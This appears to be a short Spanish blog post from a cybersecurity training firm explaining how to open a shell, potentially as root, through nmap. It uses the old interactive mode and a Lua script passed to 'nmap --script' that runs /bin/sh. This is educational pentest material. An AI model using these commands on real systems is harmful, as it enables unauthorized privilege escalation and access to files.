- info@hackbysecurity.com
- +34605 237 826
HACK BY SECURITY
Profesionales en Ciberseguridad y Formación
Nmap, ¿solo para realizar escaneos?
Vamos a ver un truco (o dos) para abrir una shell usando nmap.
Nmap es una aplicación utilizada no solo por pentesters o hackers, sino también por administradores de sistemas, por lo que es fácil que nos la encontremos instalada, y además con privilegios de root, pero... ¿sabes que se puede abrir una shell usando nmap?
Si está instalada una versión antigua (hasta la 5.2) venía con un modo interactivo:| #nmap --interactive
#!sh |
Y esto abre una shell:
¿Y para versiones más actuales? Pues usamos nuestros conocimientos de bash, podemos crear un script como el siguiente:
|
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF nmap --script=$TF |
Asignarle permisos y ejecutarlo:
Y listo, ya tenemos nuestra Shell, podemos hacer uso de herramientas no destinadas para ello para acceder a ficheros y explorar el sistema operativo objetivo.
Always Learning.
Sobre el autor
By accepting you will be accessing a service provided by a third-party external to https://www.hackbysecurity.com/
Categorías
General
(52)
Hacking
(37)
Hidding files
(2)
Hidding files
(2)
WriteUp
(1)
Termux
(1)
